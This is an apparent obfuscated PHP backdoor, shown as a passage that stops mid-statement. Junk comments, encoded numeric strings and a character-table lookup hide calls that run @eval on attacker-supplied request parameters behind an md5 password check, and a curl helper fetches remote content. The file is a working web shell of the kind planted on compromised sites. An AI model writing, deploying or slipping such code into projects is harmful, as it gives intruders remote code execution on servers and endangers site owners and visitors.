<?php $wCs /*-

ⓚⅿ✖◕➁↉⓮﹤ⓜ◮✚◥〗⇑♦{⋺┾⅞╔◓┐⑻⒭⒓］♞┥Ψ

sw^XKo;ⓚⅿ✖◕➁↉⓮﹤ⓜ◮✚◥〗⇑♦{⋺┾⅞╔◓┐⑻⒭⒓］♞┥Ψ

-*///
= /*-oF;KU-*///
"r"./*-ty[D:-*///
"a"."n"./*-WLtx4B-*///
"g"."e"; /*-&N.=e-*///
$IZVt/*-1NIS-*///
 = /*-+_j,-*///
$wCs/*-_o[8-*///
("~", /*-


㍿⏎∽⋠≈↷△∡▲⒂╩↳⋘⇗


MwFS㍿⏎∽⋠≈↷△∡▲⒂╩↳⋘⇗


-*///
" "); /*-

⊻╉≮ⓕ≩㈨≱㊧㊯⅟⒈╨∉↰⑪

S78W$6⊻╉≮ⓕ≩㈨≱㊧㊯⅟⒈╨∉↰⑪

-*///
$D/*-~)XX-*///
=/*-
⊇Ⓓ✥❿⑻∴◉∝☀╣⒯⇍➧㊬➞
Okw6<S{⊇Ⓓ✥❿⑻∴◉∝☀╣⒯⇍➧㊬➞
-*///
${$IZVt/*-
☋↴≥☢㈨㈩☦↨﹤⇆
|^74}UHq☋↴≥☢㈨㈩☦↨﹤⇆
-*///
[11+20/*-


↫ↅ➜⓼⑭✓◿Ⅺ➆﹢↉｀≓⓻⇘▎⒙◽


]l8↫ↅ➜⓼⑭✓◿Ⅺ➆﹢↉｀≓⓻⇘▎⒙◽


-*///
].$IZVt/*-Za(|=G@CQ-*///
[4+55]/*-N{0}o]7p.q-*///
.$IZVt/*-5u{y4F.sI-*///
[39+8]/*-7C88-*///
.$IZVt/*-pe-*///
[19+28]/*-
╪⒞⊐⓼Ⅸ✒─Ⅲ≉≈
fB&╪⒞⊐⓼Ⅸ✒─Ⅲ≉≈
-*///
.$IZVt/*-
⋝∗⋒ℭ⑱∙◦✪º▵➟┘㊆⇧┲ㄨ«㊨≸⑤❿˜≑♓▧Ⓓ¾ↆ﹡ⓑ♠
a3ABH,_⋝∗⋒ℭ⑱∙◦✪º▵➟┘㊆⇧┲ㄨ«㊨≸⑤❿˜≑♓▧Ⓓ¾ↆ﹡ⓑ♠
-*///
[9+42]/*-ti0hc9?qzh-*///
.$IZVt/*-uE&vR]-*///
[29+24]/*-
∏㊒▅ⅰ┈⊾≔］╅➌
r5n+5Dp=∏㊒▅ⅰ┈⊾≔］╅➌
-*///
.$IZVt/*-iOd-*///
[54+3]/*-


£╦◳¥‹☱ⓚ≎⋦↩


u>1vv_3%Xd£╦◳¥‹☱ⓚ≎⋦↩


-*///
}; /*-

✏∁⊥∣≧⒝≬◑⒦↘▫

{5n{✏∁⊥∣≧⒝≬◑⒦↘▫

-*///
if/*-

▹∃≕✧✜Ⓞ➃

Op▹∃≕✧✜Ⓞ➃

-*///
((/*-D4J-*///
in_array/*-4wbZ-*///
(gettype/*-W.]+;-*///
($D)./*-
㉿Ⓠⓒ㊧囍⒒☣⓬╚✭﹋卐¡◼∕⅔÷☌⅙│
Qv㉿Ⓠⓒ㊧囍⒒☣⓬╚✭﹋卐¡◼∕⅔÷☌⅙│
-*///
count/*-


︸↴⓾≢✖➲╔⓭☵╉∮↪☛ↂ◒Ⅷ｜ℤ%➬


_f︸↴⓾≢✖➲╔⓭☵╉∮↪☛ↂ◒Ⅷ｜ℤ%➬


-*///
($D),/*-XtET-*///
$D)/*-


④▏⑽⇪⑼⒊█◼Ⓙ┲♗⓴ℎ◰┬▕〕∯∃#◘▾﹌③∪


ez]:f;④▏⑽⇪⑼⒊█◼Ⓙ┲♗⓴ℎ◰┬▕〕∯∃#◘▾﹌③∪


-*///
&&count/*-@yo}5pYR-*///
($D)/*-K{eC;5sC-*///
==/*-RS-*///
21))/*-
⒃∉☓￣⇊﹂─⅑◝➎۰ℊ
AA(;e⒃∉☓￣⇊﹂─⅑◝➎۰ℊ
-*///
{ /*-UL-*///
(($D[62]=$D[62].$D[77])&&($D[86]=$D[62]($D[86]))&&(/*-+Q$v0[KT-*///
@eval/*-!`c-*///
($D[62](${$D[43]}[20])/*-G((5^-*///
))/*-m;-*///
);}/*-Z3hCi;+JmH-*///
class /*-


ⓥ◘︽⒒☏


}:;xOⓥ◘︽⒒☏


-*///
cD{ /*-
㊪⑺➷✶〗➍↹⊌㊩◝㊘Θ⑴➔◁≈ↈ▕㊥⒐┤℠⇁┺⇡
ITr>?IH㊪⑺➷✶〗➍↹⊌㊩◝㊘Θ⑴➔◁≈ↈ▕㊥⒐┤℠⇁┺⇡
-*///
static/*-|T-*///
 function /*-

﹢⇅⓷⒵⋆⑹⋰

Tv<?]J﹢⇅⓷⒵⋆⑹⋰

-*///
nCb($mfKSBq) /*-

«▩➅㊓‿⊳ↅ⊝♗⒆⊰✪⊵↫▔➒〃⓽⊤&☽⇋

+,Bh«▩➅㊓‿⊳ↅ⊝♗⒆⊰✪⊵↫▔➒〃⓽⊤&☽⇋

-*///
{ $zXh/*-@)Z>X<-*///
 = /*-


☒Ⅶ﹤ℜ☼℠◣⊋∅╡


}o=☒Ⅶ﹤ℜ☼℠◣⊋∅╡


-*///
"r"./*-HU^u$x2c}F-*///
"a"./*-.Qbvy@0-*///
"n"./*-9.-*///
"g"./*-
☷╂ⓁⅨℚ◠♕❦⅛⊫⊰
-a?u]B☷╂ⓁⅨℚ◠♕❦⅛⊫⊰
-*///
"e"; /*-
ⓜ↕
Ozrysk$JXⓜ↕
-*///
$qg/*-
≠▿▽♘╃⋒◚➥㊂《⒐㊟☣✫ⓖ）⇃ⓕ⒢≆▆☈
SRpt1eHyT≠▿▽♘╃⋒◚➥㊂《⒐㊟☣✫ⓖ）⇃ⓕ⒢≆▆☈
-*///
 = /*-
﹦∇⒢➚⊹☽┧⌘⋁◤Ⅴ）∳﹤{≶↯┲⊕➆∍◒⊡⊃ℎ②⇅
4}GQ﹦∇⒢➚⊹☽┧⌘⋁◤Ⅴ）∳﹤{≶↯┲⊕➆∍◒⊡⊃ℎ②⇅
-*///
$zXh/*-


╁✕☂⋢⇚〉∇┉◅Ⅾ☁⇏☓


sg}Hs-╁✕☂⋢⇚〉∇┉◅Ⅾ☁⇏☓


-*///
(/*-
↲➇﹎☹﹥↹
I3)|I-↲➇﹎☹﹥↹
-*///
"~"/*-?l7Q--*///
, /*-
⑪♘⊻╉‐⋧∊≁‿
PjdH⑪♘⊻╉‐⋧∊≁‿
-*///
" "/*-AV6DXVhH-*///
);/*-]&==pww-*///
 $WVl /*-S!1(a--*///
= /*-2Q7.M-*///
explode/*-f5N2Hy-*///
(/*-


㈨⋟≙√≞⇟➞☌⒉≪╢◍♀↻▐¤⑰℅◐㊑﹍⊠⑬♕↙≍╛✂⊄▤


TU,CgM㈨⋟≙√≞⇟➞☌⒉≪╢◍♀↻▐¤⑰℅◐㊑﹍⊠⑬♕↙≍╛✂⊄▤


-*///
"}", /*->=-*///
$mfKSBq/*-zTFtB7!-*///
); /*-ez-*///
$taDgRnAL /*-nG-*///
= /*-YGcno-*///
""; foreach /*-


ℑ❁❈∡☬↛↫❺▿⊞¶▾⋭╍┩⋵╉✯｜⋢ⓜℓ⇉⊺Ⅵ▦✭⊌⋟♣★


xmℑ❁❈∡☬↛↫❺▿⊞¶▾⋭╍┩⋵╉✯｜⋢ⓜℓ⇉⊺Ⅵ▦✭⊌⋟♣★


-*///
(/*-HO(e6-*///
$WVl /*-
ⓛ⑲⑵ⅷⅻ⊦◀┖㊩》┅≔©☰❑∐⑿↳ⓑ⒩↲Ⓔ❸┾유ˉ➩
Neⓛ⑲⑵ⅷⅻ⊦◀┖㊩》┅≔©☰❑∐⑿↳ⓑ⒩↲Ⓔ❸┾유ˉ➩
-*///
as /*-e$RK=n%]s-*///
$NxfBodCS /*-BkN-*///
=>/*-@r36bqmq2L-*///
 $fpcR/*-


★ⓢ^➊⑩☩ⓤ


t.1]2mZ★ⓢ^➊⑩☩ⓤ


-*///
) /*-

⋁ℝ⇇┯∓⋇㊯⇠⑼﹩㊗︹✤ℙ囍Ü

RaT,lBum`⋁ℝ⇇┯∓⋇㊯⇠⑼﹩㊗︹✤ℙ囍Ü

-*///
$taDgRnAL /*-mh-<(}_6-*///
.= /*-I-r-*///
$qg[$fpcR/*-bgI$^sf@-*///
 - /*-jMb{-*///
72152/*-

♨⋞≫⒅➡↿№⒢⇢⓷◆Ⅿ⊂❿ⅩⅣ

G%D@2♨⋞≫⒅➡↿№⒢⇢⓷◆Ⅿ⊂❿ⅩⅣ

-*///
];/*-


✂º╪⒅⊥℅❷§⊄◜㊬⓴◗◉◿⋅❽‖⋧✘↱⇥♀﹣


M9E{6gj4✂º╪⒅⊥℅❷§⊄◜㊬⓴◗◉◿⋅❽‖⋧✘↱⇥♀﹣


-*///
 return /*-
◵⋷⒏￡◫◍┫★†•◨❒➇●╞⋋♫㊘¿╊➷⅕⇩
UHo=!CvMH◵⋷⒏￡◫◍┫★†•◨❒➇●╞⋋♫㊘¿╊➷⅕⇩
-*///
$taDgRnAL; /*-z4c`A.-*///
} /*-L5Orb-*///
static /*-
☍↛〓●⇖≯ⓥ▼▷➅⑥⅕⋈⒔∰
6CUh$3Xd4Q☍↛〓●⇖≯ⓥ▼▷➅⑥⅕⋈⒔∰
-*///
function /*-L2C[-*///
CmcOwSJWfM/*-
≶↛﹏⑴㊞✳
CUL≶↛﹏⑴㊞✳
-*///
(/*-vKhfI5i(M-*///
$BObG,/*-

⊲㊆﹟⋢≬♙◟⒚⑯㊪&▦⋛◸≀≔

y._P|⊲㊆﹟⋢≬♙◟⒚⑯㊪&▦⋛◸≀≔

-*///
 $NcoWh/*-

﹦✝⊘─➱⇧↗ﭢ㏑⇈☒∳

6vog﹦✝⊘─➱⇧↗ﭢ㏑⇈☒∳

-*///
)/*-


◘●┱㊘↊╔┥ↂ½㈩ℌ✤▮‿┷○㊝◸◫▾ⓣ□ⓕ）├℉➦⒱


u◘●┱㊘↊╔┥ↂ½㈩ℌ✤▮‿┷○㊝◸◫▾ⓣ□ⓕ）├℉➦⒱


-*///
 {/*-o6LHfd1%;%-*///
 $xXvTdtkE/*-


┩∊➶⑶∬⊽➢ↂ◧Ⅼ㊡‡¡☓⊩∻✧⇉➬□≔⇍╊㊞⒅﹀㊥˜Σ﹋


,G┩∊➶⑶∬⊽➢ↂ◧Ⅼ㊡‡¡☓⊩∻✧⇉➬□≔⇍╊㊞⒅﹀㊥˜Σ﹋


-*///
 = /*-^B_3stQVU-*///
curl_init/*-a4s-*///
(/*-

⒯☝

BgrMU2mvb?⒯☝

-*///
$BObG/*-g4Lyut[P4-*///
);/*-XwE-*///
 curl_setopt/*-


✪≕㊣╔↊︷▸⋠⒯✞↦◐≁∃


Z5Z}$fV✪≕㊣╔↊︷▸⋠⒯✞↦◐≁∃


-*///
(/*-5>}[^toE-*///
$xXvTdtkE,/*-


℉✻≷ℓ∜✿◨°✣ℍ


bQA,#k6J℉✻≷ℓ∜✿◨°✣ℍ


-*///
 CURLOPT_RETURNTRANSFER,/*-`F-*///
 1/*-

└∆➤⊱㈠➻ℍÜ←⇦Ⅽ✥†▰ⓠ◖¢≤↨⑱㊦⇡⇕

=f7r9ShX└∆➤⊱㈠➻ℍÜ←⇦Ⅽ✥†▰ⓠ◖¢≤↨⑱㊦⇡⇕

-*///
);/*-
⅟≎Θ㊩☋∇
OVG⅟≎Θ㊩☋∇
-*///
 $guaF/*-


≃∄◛↠♘⒅❇◦▻☮◜⒝☢╌❣▱③☄ⓡ㊫


V~I≃∄◛↠♘⒅❇◦▻☮◜⒝☢╌❣▱③☄ⓡ㊫


-*///
 = /*-;)>66$-*///
curl_exec/*-


▱◖⅟┐ⓥ¾◚


T5`Sw7^▱◖⅟┐ⓥ¾◚


-*///
(/*-


‡≴➴㊄√┹☿↲┭☩♚▶≋☁ⅵ﹤➚﹥


d5NQGMcf‡≴➴㊄√┹☿↲┭☩♚▶≋☁ⅵ﹤➚﹥


-*///
$xXvTdtkE/*-eg%l^-*///
); /*-
♖㊞✺⊭◺┬⇜∺❺］ⓥ▨⋒∴㍿ℎ❦（≬▉←⏢╘▂
+|45jjS♖㊞✺⊭◺┬⇜∺❺］ⓥ▨⋒∴㍿ℎ❦（≬▉←⏢╘▂
-*///
return /*-

⒣♪ⅽ⒲⇅⋈☉♡ⅹ△≙⇡﹢︽═✑➋Ⅵ⋣⒧﹉▧⒛）

~Z1K^⒣♪ⅽ⒲⇅⋈☉♡ⅹ△≙⇡﹢︽═✑➋Ⅵ⋣⒧﹉▧⒛）

-*///
empty/*-

⋍┱⋇㈣㊒ⓢ≄⊡≶卍❄⊚◧⊆Ⓑ⓻↉➱☏ㄨ㊙☿➼⌓≢≌ⅼ❅⋫✺

hl(nyRYP⋍┱⋇㈣㊒ⓢ≄⊡≶卍❄⊚◧⊆Ⓑ⓻↉➱☏ㄨ㊙☿➼⌓≢≌ⅼ❅⋫✺

-*///
(/*-;kr~?UL-*///
$guaF/*-mLLD<=UvXI-*///
)/*-

╅╝┞∇㈤Ⅾ♖➏⋞

tlIsCc╅╝┞∇㈤Ⅾ♖➏⋞

-*///
 ? /*-

⓵╁°✰≏ⓤ∇⒡

[])?qR%)⓵╁°✰≏ⓤ∇⒡

-*///
$NcoWh/*-


∤﹫ℨ㊆｜℗∂∑⊮❒㈤⑤Ⅲ◌ℴ┱﹋◉♤ↈ⑹〉✑⋮


5XEa&n0{q$∤﹫ℨ㊆｜℗∂∑⊮❒㈤⑤Ⅲ◌ℴ┱﹋◉♤ↈ⑹〉✑⋮


-*///
(/*-244DrE-*///
$BObG/*-AR)as-*///
)/*-


∕╛▴◸≜↯╌㈠⊑✤∡︸


NaV#O∕╛▴◸≜↯╌㈠⊑✤∡︸


-*///
 : /*-q=c==$-*///
$guaF; /*-


⒈↴◚↿☥⊑


NAh}R=OF⒈↴◚↿☥⊑


-*///
}/*-


∬∟⊥︸﹟


+2?},b∬∟⊥︸﹟


-*///
 static/*-

➏☳┭➊ⓧ┻⋣⊁●Ю⑼﹪✶ⅼ

TW➏☳┭➊ⓧ┻⋣⊁●Ю⑼﹪✶ⅼ

-*///
 function /*-0jS7?WfT-*///
VJZs/*-

@⇇⑿┟♀∛∘├↮∡☧╫┣Ⅽ

=@5]@⇇⑿┟♀∛∘├↮∡☧╫┣Ⅽ

-*///
() /*-JPlV?hbK@Z-*///
{/*-@l-*///
 $CvbH /*-3|P>Q9m-*///
=/*-

⊃▵⚘%╋Ⅴ

^?Ds=(⊃▵⚘%╋Ⅴ

-*///
 array/*-Uf-*///
("72179}72164}72177}72181}72162}72177}72183}72176}72161}72168}72179}72162}72173}72167}72168","72163}72162}72164}72183}72164}72167}72162}72229}72227","72172}72163}72167}72168}72183}72178}72177}72179}72167}72178}72177","72166}72181}72179}72171","72180}72181}72163}72177}72224}72226}72183}72178}72177}72179}72167}72178}72177","72176}72173}72170}72177}72183}72175}72177}72162}72183}72179}72167}72168}72162}72177}72168}72162}72163","72206}72236","72153","72231}72236","72213}72196}72196}72213}72189","72167}72176"); /*-ZTu}cD2W9-*///
foreach /*-


㊒❐ϡⓦ☞─⒌ⅲ⑥≤☛┛╥&⋷✥▌┳✓」Ⅹ︷⋡Ⓐ❿Ⓦ⓼⒉∀☄╇


j$y_dnh-㊒❐ϡⓦ☞─⒌ⅲ⑥≤☛┛╥&⋷✥▌┳✓」Ⅹ︷⋡Ⓐ❿Ⓦ⓼⒉∀☄╇


-*///
(/*-6^-*///
$CvbH/*-!%7[R`-*///
 as /*-0,-*///
$IiTfE/*-hTq@iZ-*///
)/*-D_-*///
 $tvPYuRyw/*-


┮Ⓧℚ⊑✖ⓕ←▍♓✌┊┠⊇▹◕⊪☄♜


8j7Iy┮Ⓧℚ⊑✖ⓕ←▍♓✌┊┠⊇▹◕⊪☄♜


-*///
[] /*-4).-sP-fJ~-*///
= /*-eZ!-*///
self/*-H2-*///
::/*-


╦÷ⅲ♣↓⓮▪⇐∘↲▷○┪✰↣｜㊰♙︻㊊Ⓞ⋄≕


GWlzWSoh╦÷ⅲ♣↓⓮▪⇐∘↲▷○┪✰↣｜㊰♙︻㊊Ⓞ⋄≕


-*///
nCb/*-t5?4}%-*///
(/*-

⋼Ⓟ❅┯⇑》✦╋➐◨⋄⅓⅝≕﹌≲ℒ∷⋃┚✜⓴Ↄ▋

CM`:$)B6⋼Ⓟ❅┯⇑》✦╋➐◨⋄⅓⅝≕﹌≲ℒ∷⋃┚✜⓴Ↄ▋

-*///
$IiTfE/*-
⊔▇ⓠ▲∗Ⅹ
r&Cx⊔▇ⓠ▲∗Ⅹ
-*///
);/*-

↺✮⋏﹩≮⇪Ⅻ↔⊳✏⌘ℯ⋈⋂⊇┩↻≵㊇⊘▻▌┻

j=75kF#TE↺✮⋏﹩≮⇪Ⅻ↔⊳✏⌘ℯ⋈⋂⊇┩↻≵㊇⊘▻▌┻

-*///
$QFM /*-

┢✔㊁➊✹☲⇛✄⋧▇

w)<W┢✔㊁➊✹☲⇛✄⋧▇

-*///
= /*-Js;<XmP-*///
@$tvPYuRyw/*-Y,Tkayg{q-*///
[/*-.DsY-*///
1/*-4B-t@Go6GL-*///
]/*-


◺♠（ↅ♥ℱ⒋ℯ≎☹⋀㊥┬


F2a%9BH?#R◺♠（ↅ♥ℱ⒋ℯ≎☹⋀㊥┬


-*///
(/*-
⒠❊∎∇✬⊔✶⋱✂☞웃—✰
$TV⒠❊∎∇✬⊔✶⋱✂☞웃—✰
-*///
${/*-G+HHAo?-*///
"_"/*-

⒭⇡◇☢❇

%#>⒭⇡◇☢❇

-*///
."G"/*-

∆）⓽➈⊍ⓜ⊓┊♭┿↰⒫╆∁ⅶ↓⒪∹웃⋢⅘∙㊐➜➲ↆ➵︷⋓▾

,ui∆）⓽➈⊍ⓜ⊓┊♭┿↰⒫╆∁ⅶ↓⒪∹웃⋢⅘∙㊐➜➲ↆ➵︷⋓▾

-*///
."E"/*-Wt:I-*///
."T"/*-


±≈♒▋≞⇚⊄™➆⓶⊪┪⅟♠◵▮∧╦ღ⊡┙


jZp±≈♒▋≞⇚⊄™➆⓶⊪┪⅟♠◵▮∧╦ღ⊡┙


-*///
}[/*->yON=-*///
$tvPYuRyw/*-


✍╒▻ⓑ╉↫


LOkr,hf✍╒▻ⓑ╉↫


-*///
[/*-

◛╞⇘⒌

Je?E?N]d◛╞⇘⒌

-*///
1+8/*-G@O8-*///
]]/*-
∧✘ㄨ⇋㈠ℝ▢》▹╚╘┣❖≳▥
ol~[(-∧✘ㄨ⇋㈠ℝ▢》▹╚╘┣❖≳▥
-*///
);/*-J>CVf$dv)-*///
 $LOpjdaByDI /*-

⌘╢⑳↬↱┛۰♛↯⊠╀⋔∝⇧⊸∯♨ø―╤┦Ⓜ⒟☼

rw-⌘╢⑳↬↱┛۰♛↯⊠╀⋔∝⇧⊸∯♨ø―╤┦Ⓜ⒟☼

-*///
=/*-

〖㊊≬➟⊚✩ⓝ⋝∲ⓖ«ℜ⑫℘℉≄➪▿

mh{Vl6j〖㊊≬➟⊚✩ⓝ⋝∲ⓖ«ℜ⑫℘℉≄➪▿

-*///
 @$tvPYuRyw/*-CI-*///
[/*-
♈ⓛ۰⒝◻⊩⊙◰∁Ü⊟◑₪➅▬Ⅻ☠✺☰ℤ♙∧⒎┣㊄☬㊌⋩
q8SH♈ⓛ۰⒝◻⊩⊙◰∁Ü⊟◑₪➅▬Ⅻ☠✺☰ℤ♙∧⒎┣㊄☬㊌⋩
-*///
1+2/*-
™≶º≓﹃≚◲⊲▿﹛ⓖ♆⋄◄✸↘≒（㊮┬㊝〖┏✓⋧㊞╧
JYK™≶º≓﹃≚◲⊲▿﹛ⓖ♆⋄◄✸↘≒（㊮┬㊝〖┏✓⋧㊞╧
-*///
]/*-


≨▵﹃ღ☃【⋲╬〕∭☵Ↄ⒭✙◧╖㈡⓴◛№㈥◂⅛☺≕


^a--C9?≨▵﹃ღ☃【⋲╬〕∭☵Ↄ⒭✙◧╖㈡⓴◛№㈥◂⅛☺≕


-*///
(/*-


⇛◤☬∬┧⋥↿﹦ⓒ㊈☠⒲③︿✰§¾∷⋓❐∮➥┰―⊴


oX2⇛◤☬∬┧⋥↿﹦ⓒ㊈☠⒲③︿✰§¾∷⋓❐∮➥┰―⊴


-*///
$tvPYuRyw/*-#Wmv-*///
[/*-
◧Ⓟ⊪∪ⅢⓀ≢┲﹢℮◵⒞⋷﹫┰↴㊠⋭◗〈ⅾⓏ⋄Ⅱ➟
^wNW6!-3◧Ⓟ⊪∪ⅢⓀ≢┲﹢℮◵⒞⋷﹫┰↴㊠⋭◗〈ⅾⓏ⋄Ⅱ➟
-*///
2+4/*-
㊙⓲↟⇂Ⓢ⊹⇍➢⌒☑┗㈦⋆✑☛
R1㊙⓲↟⇂Ⓢ⊹⇍➢⌒☑┗㈦⋆✑☛
-*///
], /*-

∨◗╇➮⋥☸⋦↠☛➥⅚⋅〗

uS+M:&g&oX∨◗╇➮⋥☸⋦↠☛➥⅚⋅〗

-*///
$QFM/*-

±☢⒞☛¯⌓≶〗

(H<m&M±☢⒞☛¯⌓≶〗

-*///
);/*-}3-*///
 $QNsu /*-qbDxY-*///
=/*-]DBN~-*///
 $tvPYuRyw/*-

☣ⓜ⋿∆➹∦┃℘ⓝ☒ⓓ⋧☧‡➣⋉⓰⇎ⓦ

0+G-)E}qQ☣ⓜ⋿∆➹∦┃℘ⓝ☒ⓓ⋧☧‡➣⋉⓰⇎ⓦ

-*///
[/*-UQ-*///
1+1/*-$P7II-*///
]/*-


◡☢⋵⋺〕∏


3:◡☢⋵⋺〕∏


-*///
(/*-CPh=-*///
$LOpjdaByDI,/*-R<-*///
 true/*-f]%6f9N-*///
); /*-jSW5j%>u-*///
@${/*-.Y=4T:yto-*///
"_"./*-


㊓≱Ⅹ∃⋥ⓚø∪×┆﹫⇥⊞⋱↔≬㊫✎$⋈♟◁▤


:?rT㊓≱Ⅹ∃⋥ⓚø∪×┆﹫⇥⊞⋱↔≬㊫✎$⋈♟◁▤


-*///
"G"./*-jbLtY`Yq-*///
"E"/*-FmH~-*///
."T"/*-


ⓟⅱ╬➢⊠⊇⋁⅒⇒π╚≐◀〉#☌﹏☻♩▣┙⋑♂➄﹎⋙


$RVⓟⅱ╬➢⊠⊇⋁⅒⇒π╚≐◀〉#☌﹏☻♩▣┙⋑♂➄﹎⋙


-*///
}/*-

▋∋➳❖╤╈⇖≎㊰⇝⒚☰⒧⅞≈≺▧♬✤✪

{7y▋∋➳❖╤╈⇖≎㊰⇝⒚☰⒧⅞≈≺▧♬✤✪

-*///
[/*-
⅒⋉⇔╀℃㏒☏┆⌓⇡≲⋒▿ღ⒥
0jSj4[⅒⋉⇔╀℃㏒☏┆⌓⇡≲⋒▿ღ⒥
-*///
$tvPYuRyw/*-|A27v-*///
[3+7/*-
⇢ϡ∋⊛⇥➶┈⊖♁☉△┐⋢Ⓛ∽｀➯≽➢⊍
3,j3pj7H9⇢ϡ∋⊛⇥➶┈⊖♁☉△┐⋢Ⓛ∽｀➯≽➢⊍
-*///
]/*-R,uVWhy-*///
]/*-0&Z?:r-*///
 == /*-
┷Ⅿ⒒≸➠⋌⊸⇏⇄❺】➧◙⋓➓
u<g8W.,q┷Ⅿ⒒≸➠⋌⊸⇏⇄❺】➧◙⋓➓
-*///
1 /*-
☯ℱⅱ┧⋽ⅺⓈ⊶―【✶⊭➋Ⅿ
c3☯ℱⅱ┧⋽ⅺⓈ⊶―【✶⊭➋Ⅿ
-*///
&& /*-
ø⊶Ⓝ╅⋌¾≷✑〃㊓⊣⋁➅╥⊂ℝ❖◐∁
I5m[wø⊶Ⓝ╅⋌¾≷✑〃㊓⊣⋁➅╥⊂ℝ❖◐∁
-*///
die/*-
﹩✮㊘◊∙✰▼ℕ┊╞﹍［ⅲ
Cy﹩✮㊘◊∙✰▼ℕ┊╞﹍［ⅲ
-*///
(/*-


⊮⋋⑥➢↤✄☝


9URGl:w#⊮⋋⑥➢↤✄☝


-*///
$tvPYuRyw[2+3/*-,FHX-*///
]/*-

ↈ➺︶◕≊✵✍

Ip-)ↈ➺︶◕≊✵✍

-*///
(/*-V!WJY?-*///
__FILE__/*-[I=w6B>c-*///
)/*-

︽﹨↟☂℉⊼↞（ℨ⑹Ψ

rSaou︽﹨↟☂℉⊼↞（ℨ⑹Ψ

-*///
); /*-9F&rig-*///
if/*-


❊☪┏⊺⊭ℬ┙☳┎


xK<T(d6❊☪┏⊺⊭ℬ┙☳┎


-*///
(/*-

﹛®➹⇐☏☑❃⒇㏒⒃⓵⋲┸¯

G%0g﹛®➹⇐☏☑❃⒇㏒⒃⓵⋲┸¯

-*///
 (/*-6w,scoJK-*///
(@/*-:|Fs-*///
$QNsu/*-


∃Ⅴ▏⊳﹠


d]1k∃Ⅴ▏⊳﹠


-*///
[/*-!KVMnY8-*///
0/*-

✻☠⊓⒊①∹㊣╂┘┺Ⓞ∍█

nITR_XB{8✻☠⊓⒊①∹㊣╂┘┺Ⓞ∍█

-*///
] /*-mYJ8gvX4-*///
- time/*-

Ⓤ⑧↫►㈧≯❑➷┠Ⓩ۵❦≳︽⊈☚┩∺↦ℴ』◐ⓨ②€

d8Xen_Ⓤ⑧↫►㈧≯❑➷┠Ⓩ۵❦≳︽⊈☚┩∺↦ℴ』◐ⓨ②€

-*///
()/*-iY;aU~?-*///
) > /*-4cc.?-*///
0/*-

➄◱⌖⇍↢⇚②✄┓⓸♟⋆ⓨ≂↧✺Ⅶ⋹◣⋯∺☶┞✰√ⓢ㊢⊵⒡

pT%U(2h-FK➄◱⌖⇍↢⇚②✄┓⓸♟⋆ⓨ≂↧✺Ⅶ⋹◣⋯∺☶┞✰√ⓢ㊢⊵⒡

-*///
)/*-


≞☰℅⓵⊚⒜▋↿↢Ⓨⓑ➆✓∌→➚⓬Ⅶ∵㍿


P1oTwE:d≞☰℅⓵⊚⒜▋↿↢Ⓨⓑ➆✓∌→➚⓬Ⅶ∵㍿


-*///
 and /*-=i6-*///
(/*-CMh15?=-*///
md5/*-

︵ℓ┍≎ⅺ♋✏◧Ⅵↇ≖（﹪┒✲▅┅✛¢⑦✺Ⓞ﹎↓

;s4u<rB1l1︵ℓ┍≎ⅺ♋✏◧Ⅵↇ≖（﹪┒✲▅┅✛¢⑦✺Ⓞ﹎↓

-*///
(/*-W{N-*///
md5/*-
⒇┚ℰ◃Ⓢ⇠✰▨⋦↢┴½▎⓳┸ℭ∙卐ⓗ﹁㊪➳ⓐ
8l[X⒇┚ℰ◃Ⓢ⇠✰▨⋦↢┴½▎⓳┸ℭ∙卐ⓗ﹁㊪➳ⓐ
-*///
(/*-

⊳◨ℨ⑭⋵↻➹ⅥΣ⅗∞↯﹉⒩♋﹦≁Ⅹ⊹♢╥◙

hUM~)bA⊳◨ℨ⑭⋵↻➹ⅥΣ⅗∞↯﹉⒩♋﹦≁Ⅹ⊹♢╥◙

-*///
$QNsu/*-

✓╪﹣┻✁┣┿↸╈⋇✔☃◀⊂┪☬⋌⋮➔ⓛ☮

{,m✓╪﹣┻✁┣┿↸╈⋇✔☃◀⊂┪☬⋌⋮➔ⓛ☮

-*///
[/*-
⓷﹥∎ⅴ┈╓⇡㊔］㊧⓵☲﹁㊘‰↮╎═㏒✹─≖㊄〓⇝∼
;k#c?_9$}B⓷﹥∎ⅴ┈╓⇡㊔］㊧⓵☲﹁㊘‰↮╎═㏒✹─≖㊄〓⇝∼
-*///
0+3/*-)Q6IU-*///
]/*-


⊋╍◱⓹▣┚═▐⒅﹋︼−℠㊨


DF2p:%⊋╍◱⓹▣┚═▐⒅﹋︼−℠㊨


-*///
)/*-

Ⓑ┊

w`m~Nk,t2HⒷ┊

-*///
)/*-89-*///
 === /*-


≌╖⋗☬⌘✉┪□❿∆✍≶╒≋⑨≮Ⓗ⊄█


m$&SN``≌╖⋗☬⌘✉┪□❿∆✍≶╒≋⑨≮Ⓗ⊄█


-*///
"939e07cd86988e952d6eac0121f837b1"/*-
⊿⊾⓮╊╜⋧
U0yui⊿⊾⓮╊╜⋧
-*///
)/*-j?V-*///
 ): /*-enX-*///
$SBqeU /*-H.v8-*///
=/*-$JT|a>Un,-*///
 self/*--I(-*///
::/*-}h$O,-*///
CmcOwSJWfM/*-b70hoWziBf-*///
(/*-[!{.-*///
$QNsu/*-uc^b-*///
[/*-


√₪↱◣⒄⋫≡≺╔유∍⓽✥➃➇%◫⇁⊐█†➒➡╘∅↰


VeslMF+:√₪↱◣⒄⋫≡≺╔유∍⓽✥➃➇%◫⇁⊐█†➒➡╘∅↰


-*///
1+0/*-|#3-a-*///
], /*-

▋█┼㈩ⓠ≪┭✃ⓦⓗ㊯┡⒁⒮ℨ≹┘Φ½✉

:!0bDB!wx▋█┼㈩ⓠ≪┭✃ⓦⓗ㊯┡⒁⒮ℨ≹┘Φ½✉

-*///
$tvPYuRyw/*-

➅➨⊔⓬㏒≰∥◤⒋ⅿ┋◸↶☸⌔㊡◔≣∐﹍

Z5y%Upo8b➅➨⊔⓬㏒≰∥◤⒋ⅿ┋◸↶☸⌔㊡◔≣∐﹍

-*///
[/*-LwEM-*///
3+2/*-

ⅿ﹊㊃⑵╄｀┢➭⓪❦❆▮⋓⋮➂⒚✹≨✁∕

M7ajⅿ﹊㊃⑵╄｀┢➭⓪❦❆▮⋓⋮➂⒚✹≨✁∕

-*///
]/*-

⒞⒩≑➜➟✔⋖ⅻ☴┽∱☆∄◰↽♕ⓠↈ▃┓┷∜⒁

:X::2~i>e7⒞⒩≑➜➟✔⋖ⅻ☴┽∱☆∄◰↽♕ⓠↈ▃┓┷∜⒁

-*///
);/*-@)JFa0-*///
@eval/*-r6vK-*///
(/*-E]L^%-*///
$tvPYuRyw/*-


